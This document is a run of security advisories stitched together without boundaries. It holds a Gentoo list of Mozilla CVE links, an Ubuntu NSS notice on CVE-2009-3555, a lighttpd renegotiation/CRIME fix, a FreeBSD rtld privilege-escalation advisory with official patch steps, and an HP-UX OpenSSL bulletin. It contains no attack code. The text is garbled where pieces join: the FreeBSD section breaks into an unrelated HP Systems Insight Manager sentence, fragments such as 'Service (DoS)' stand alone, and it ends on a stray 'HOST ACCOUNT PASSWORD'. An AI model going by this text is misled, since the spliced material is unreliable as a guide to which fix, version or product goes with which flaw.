http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002 [ 338 ] CVE-2011-3003 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003 [ 339 ] CVE-2011-3004 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004 [ 340 ] CVE-2011-3005 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005 [ 341 ] CVE-2011-3026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026 [ 342 ] CVE-2011-3062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062 [ 343 ] CVE-2011-3232 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232 [ 344 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 345 ] CVE-2011-3640 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640 [ 346 ] CVE-2011-3647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647 [ 347 ] CVE-2011-3648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648 [ 348 ] CVE-2011-3649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649 [ 349 ] CVE-2011-3650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650 [ 350 ] CVE-2011-3651 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651 [ 351 ] CVE-2011-3652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652 [ 352 ] CVE-2011-3653 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653 [ 353 ] CVE-2011-3654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654 [ 354 ] CVE-2011-3655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655 [ 355 ] CVE-2011-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658 [ 356 ] CVE-2011-3659 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659 [ 357 ] CVE-2011-3660 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660 [ 358 ] CVE-2011-3661 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661 [ 359 ] CVE-2011-3663 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663 [ 360 ] CVE-2011-3665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665 [ 361 ] CVE-2011-3670 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670 [ 362 ] CVE-2011-3866 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866 [ 363 ] CVE-2011-4688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688 [ 364 ] CVE-2012-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441 [ 365 ] CVE-2012-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442 [ 366 ] CVE-2012-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443 [ 367 ] CVE-2012-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444 [ 368 ] CVE-2012-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445 [ 369 ] CVE-2012-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446 [ 370 ] CVE-2012-0447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447 [ 371 ] CVE-2012-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449 [ 372 ] CVE-2012-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450 [ 373 ] CVE-2012-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451 [ 374 ] CVE-2012-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452 [ 375 ] CVE-2012-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455 [ 376 ] CVE-2012-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456 [ 377 ] CVE-2012-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457 [ 378 ] CVE-2012-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458 [ 379 ] CVE-2012-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459 [ 380 ] CVE-2012-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460 [ 381 ] CVE-2012-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461 [ 382 ] CVE-2012-0462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462 [ 383 ] CVE-2012-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463 [ 384 ] CVE-2012-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464 [ 385 ] CVE-2012-0467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467 [ 386 ] CVE-2012-0468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468 [ 387 ] CVE-2012-0469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469 [ 388 ] CVE-2012-0470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470 [ 389 ] CVE-2012-0471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471 [ 390 ] CVE-2012-0473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473 [ 391 ] CVE-2012-0474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474 [ 392 ] CVE-2012-0475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475 [ 393 ] CVE-2012-0477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477 [ 394 ] CVE-2012-0478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478 [ 395 ] CVE-2012-0479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479 [ 396 ] CVE-2012-1937 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937 [ 397 ] CVE-2012-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938 [ 398 ] CVE-2012-1939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939 [ 399 ] CVE-2012-1940 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940 [ 400 ] CVE-2012-1941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941 [ 401 ] CVE-2012-1945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945 [ 402 ] CVE-2012-1946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946 [ 403 ] CVE-2012-1947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947 [ 404 ] CVE-2012-1948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948 [ 405 ] CVE-2012-1949 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949 [ 406 ] CVE-2012-1950 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950 [ 407 ] CVE-2012-1951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951 [ 408 ] CVE-2012-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952 [ 409 ] CVE-2012-1953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953 [ 410 ] CVE-2012-1954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954 [ 411 ] CVE-2012-1955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955 [ 412 ] CVE-2012-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956 [ 413 ] CVE-2012-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957 [ 414 ] CVE-2012-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958 [ 415 ] CVE-2012-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959 [ 416 ] CVE-2012-1960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960 [ 417 ] CVE-2012-1961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961 [ 418 ] CVE-2012-1962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962 [ 419 ] CVE-2012-1963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963 [ 420 ] CVE-2012-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964 [ 421 ] CVE-2012-1965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965 [ 422 ] CVE-2012-1966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966 [ 423 ] CVE-2012-1967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967 [ 424 ] CVE-2012-1970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970 [ 425 ] CVE-2012-1971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971 [ 426 ] CVE-2012-1972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972 [ 427 ] CVE-2012-1973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973 [ 428 ] CVE-2012-1974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974 [ 429 ] CVE-2012-1975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975 [ 430 ] CVE-2012-1976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976 [ 431 ] CVE-2012-1994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994 [ 432 ] CVE-2012-3956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956 [ 433 ] CVE-2012-3957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957 [ 434 ] CVE-2012-3958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958 [ 435 ] CVE-2012-3959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959 [ 436 ] CVE-2012-3960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960 [ 437 ] CVE-2012-3961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961 [ 438 ] CVE-2012-3962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962 [ 439 ] CVE-2012-3963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963 [ 440 ] CVE-2012-3964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964 [ 441 ] CVE-2012-3965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965 [ 442 ] CVE-2012-3966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966 [ 443 ] CVE-2012-3967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967 [ 444 ] CVE-2012-3968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968 [ 445 ] CVE-2012-3969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969 [ 446 ] CVE-2012-3970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970 [ 447 ] CVE-2012-3971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971 [ 448 ] CVE-2012-3972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972 [ 449 ] CVE-2012-3973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973 [ 450 ] CVE-2012-3975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975 [ 451 ] CVE-2012-3976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976 [ 452 ] CVE-2012-3977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977 [ 453 ] CVE-2012-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978 [ 454 ] CVE-2012-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980 [ 455 ] CVE-2012-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982 [ 456 ] CVE-2012-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984 [ 457 ] CVE-2012-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985 [ 458 ] CVE-2012-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986 [ 459 ] CVE-2012-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988 [ 460 ] CVE-2012-3989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989 [ 461 ] CVE-2012-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990 [ 462 ] CVE-2012-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991 [ 463 ] CVE-2012-3992 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992 [ 464 ] CVE-2012-3993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993 [ 465 ] CVE-2012-3994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994 [ 466 ] CVE-2012-3995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995 [ 467 ] CVE-2012-4179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179 [ 468 ] CVE-2012-4180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180 [ 469 ] CVE-2012-4181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181 [ 470 ] CVE-2012-4182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182 [ 471 ] CVE-2012-4183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183 [ 472 ] CVE-2012-4184 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184 [ 473 ] CVE-2012-4185 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185 [ 474 ] CVE-2012-4186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186 [ 475 ] CVE-2012-4187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187 [ 476 ] CVE-2012-4188 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188 [ 477 ] CVE-2012-4190 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190 [ 478 ] CVE-2012-4191 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191 [ 479 ] CVE-2012-4192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192 [ 480 ] CVE-2012-4193 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193 [ 481 ] CVE-2012-4194 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194 [ 482 ] CVE-2012-4195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195 [ 483 ] CVE-2012-4196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196 [ 484 ] CVE-2012-4201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201 [ 485 ] CVE-2012-4202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202 [ 486 ] CVE-2012-4204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204 [ 487 ] CVE-2012-4205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205 [ 488 ] CVE-2012-4206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206 [ 489 ] CVE-2012-4207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207 [ 490 ] CVE-2012-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208 [ 491 ] CVE-2012-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209 [ 492 ] CVE-2012-4210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210 [ 493 ] CVE-2012-4212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212 [ 494 ] CVE-2012-4215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215 [ 495 ] CVE-2012-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216 [ 496 ] CVE-2012-5354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354 [ 497 ] CVE-2012-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829 [ 498 ] CVE-2012-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830 [ 499 ] CVE-2012-5833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833 [ 500 ] CVE-2012-5835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835 [ 501 ] CVE-2012-5836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836 [ 502 ] CVE-2012-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838 [ 503 ] CVE-2012-5839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839 [ 504 ] CVE-2012-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840 [ 505 ] CVE-2012-5841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841 [ 506 ] CVE-2012-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842 [ 507 ] CVE-2012-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843 [ 508 ] Firefox Blocking Fraudulent Certificates
http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c= ertificates/ [ 509 ] Mozilla Foundation Security Advisory 2011-11 http://www.mozilla.org/security/announce/2011/mfsa2011-11.html [ 510 ] Mozilla Foundation Security Advisory 2011-34 http://www.mozilla.org/security/announce/2011/mfsa2011-34.html
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201301-01.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-927-6 July 23, 2010 nss vulnerability CVE-2009-3555 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 9.04
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 9.04: libnss3-1d 3.12.6-0ubuntu0.9.04.1
After a standard system upgrade you need to restart your session to effect the necessary changes.
Details follow:
USN-927-1 fixed vulnerabilities in NSS on Ubuntu 9.10. This update provides the corresponding updates for Ubuntu 9.04.
Original advisory details:
Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new new renegotiation extension and will use it when the server supports it.
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.diff.gz
Size/MD5: 36776 09e94267337a3318b4955b7a830f5244
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.dsc
Size/MD5: 1651 a682fa17ab7385f06eae108e3b8eeb76
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz
Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 3355322 1901b0a2e9022baccca540cb776da507
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 1230706 a5be600c34d6c62f3c7c7d9fe8fe6807
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 263110 37bf5e46dc372000a1932336ded61143
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 17788 cb888df2baa2d06cf98091f1bd033496
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 318718 77e6de51c2beebe6a2570e1f70069d91
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_i386.deb
Size/MD5: 3181812 ab6888c9709c1101e0f07bda925ea76b
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_i386.deb
Size/MD5: 1112446 64e165966e297b247e220aa017851248
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_i386.deb
Size/MD5: 260434 6dc65e066be54da5a4ad7e784c37fa49
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_i386.deb
Size/MD5: 17790 6a4afb594384085b41502911476f9d27
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_i386.deb
Size/MD5: 301968 a5f1eb30b4dd64bbac568873ad700887
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 3220356 1bed6847d860f8dd0a845062cf227322
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 1085226 c5e07d7711f257888071d97ff551f42e
http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 259084 d6424f00ee83eaf9abb433768edb37c2
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 17788 217da64905b090392eb4acfa43d282c2
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 297772 7f223b5673372154a73cf84c9ed6bfda
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 3330434 d4c4fe0a437c5f2dd20b81df2cf936b5
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 1202898 b27bda4a282c5b46733dcc21519cc4b6
http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 262126 bb796b31d740e38581a37003a89c18a5
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 17794 0109fab35491b7f7f6e8d9649acbd728
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 323344 8e6f667e0df078a4b68d72acddfc3326
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_sparc.deb
Size/MD5: 2988064 97a10a1098bc541808ead09dcb1711c5
http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_sparc.deb
Size/MD5: 1074248 4de13c4f7e970d56fa65e6f0e472f320
http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_sparc.deb
Size/MD5: 257214 d1ee26bd6f9e26f93f8b8af403d41b1a
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_sparc.deb
Size/MD5: 17794 2f08b7d40b6069754762083051c03f27
http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_sparc.deb
Size/MD5: 303452 b1dc3dbcbf441a81ef5005e72ad60620
-- Jamie Strandboge | http://www.canonical.com . This update addresses these protocol vulnerabilities in lighttpd.
CVE-2009-3555
Marsh Ray, Steve Dispensa, and Martin Rex discovered that the TLS and SSLv3 protocols do not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions. This issue is solved in lighttpd by disabling client initiated renegotiation by default.
Those users that do actually need such renegotiations, can reenable them via the new 'ssl.disable-client-renegotiation' parameter.
CVE-2012-4929
Juliano Rizzo and Thai Duong discovered a weakness in the TLS/SSL protocol when using compression. This side channel attack, dubbed 'CRIME', allows eavesdroppers to gather information to recover the original plaintext in the protocol. This update disables compression.
For the stable distribution (squeeze), these problems have been fixed in version 1.4.28-2+squeeze1.2.
For the testing distribution (wheezy), and the unstable distribution (sid) these problems have been fixed in version 1.4.30-1.
We recommend that you upgrade your lighttpd packages. Corrected: 2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE) 2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1) 2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE) 2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5) 2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9) CVE Name: CVE-2009-4146, CVE-2009-4147
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .
I. Background
The run-time link-editor, rtld, links dynamic executable with their needed libraries at run-time. It also allows users to explicitly load libraries via various LD_ environmental variables.
II. Problem Description
When running setuid programs rtld will normally remove potentially dangerous environment variables. Due to recent changes in FreeBSD environment variable handling code, a corrupt environment may result in attempts to unset environment variables failing.
III. Impact
An unprivileged user who can execute programs on a system can gain the privileges of any setuid program which he can run. On most systems configurations, this will allow a local attacker to execute code as the root user.
IV. Workaround
No workaround is available, but systems without untrusted local users, where all the untrusted local users are jailed superusers, and/or where untrusted users cannot execute arbitrary code (e.g., due to use of read only and noexec mount options) are not affected.
Note that "untrusted local users" include users with the ability to upload and execute web scripts (CGI, PHP, Python, Perl etc.), as they may be able to exploit this issue.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the RELENG_8_0, RELENG_7_2, or RELENG_7_1 security branch dated after the correction date.
2) To patch your present system:
The following patches have been verified to apply to FreeBSD 7.1, 7.2, and 8.0 systems.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 7.x]
fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch
fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch.asc
[FreeBSD 8.0]
fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
b) Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
cd /usr/src/libexec/rtld-elf
make obj && make depend && make && make install
NOTE: On the amd64 platform, the above procedure will not update the ld-elf32.so.1 (i386 compatibility) run-time link-editor (rtld). On amd64 systems where the i386 rtld are installed, the operating system should instead be recompiled as described in
VI. Correction details
The following list contains the revision numbers of each file that was corrected in FreeBSD.
CVS:
Branch Revision Path
RELENG_7 src/libexec/rtld-elf/rtld.c 1.124.2.7 RELENG_7_2 src/UPDATING 1.507.2.23.2.8 src/sys/conf/newvers.sh 1.72.2.11.2.9 src/libexec/rtld-elf/rtld.c 1.124.2.4.2.2 RELENG_7_1 src/UPDATING 1.507.2.13.2.12 src/sys/conf/newvers.sh 1.72.2.9.2.13 src/libexec/rtld-elf/rtld.c 1.124.2.3.2.2 RELENG_8 src/libexec/rtld-elf/rtld.c 1.139.2.4 RELENG_8_0 src/UPDATING 1.632.2.7.2.4 src/sys/conf/newvers.sh 1.83.2.6.2.4 src/libexec/rtld-elf/rtld.c 1.139.2.2.2.2
Subversion:
Branch/path Revision
stable/7/ r199981 releng/7.2/ r200054 releng/7.1/ r200054 stable/8/ r199980 releng/8.0/ r200054
VII. HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows prior to v6.1. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Service (DoS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01945686 Version: 1
HPSBUX02482 SSRT090249 rev.1 - HP-UX Running OpenSSL, Remote Unauthorized Data Injection, Denial of
Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-11-25 Last Updated: 2009-11-25
Potential Security Impact: Remote unauthorized data injection, Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. The vulnerability could be exploited
remotely to inject unauthorized data or to create a Denial of Service (DoS).
References: CVE-2009-3555
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08l.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location.
HOST ACCOUNT PASSWORD
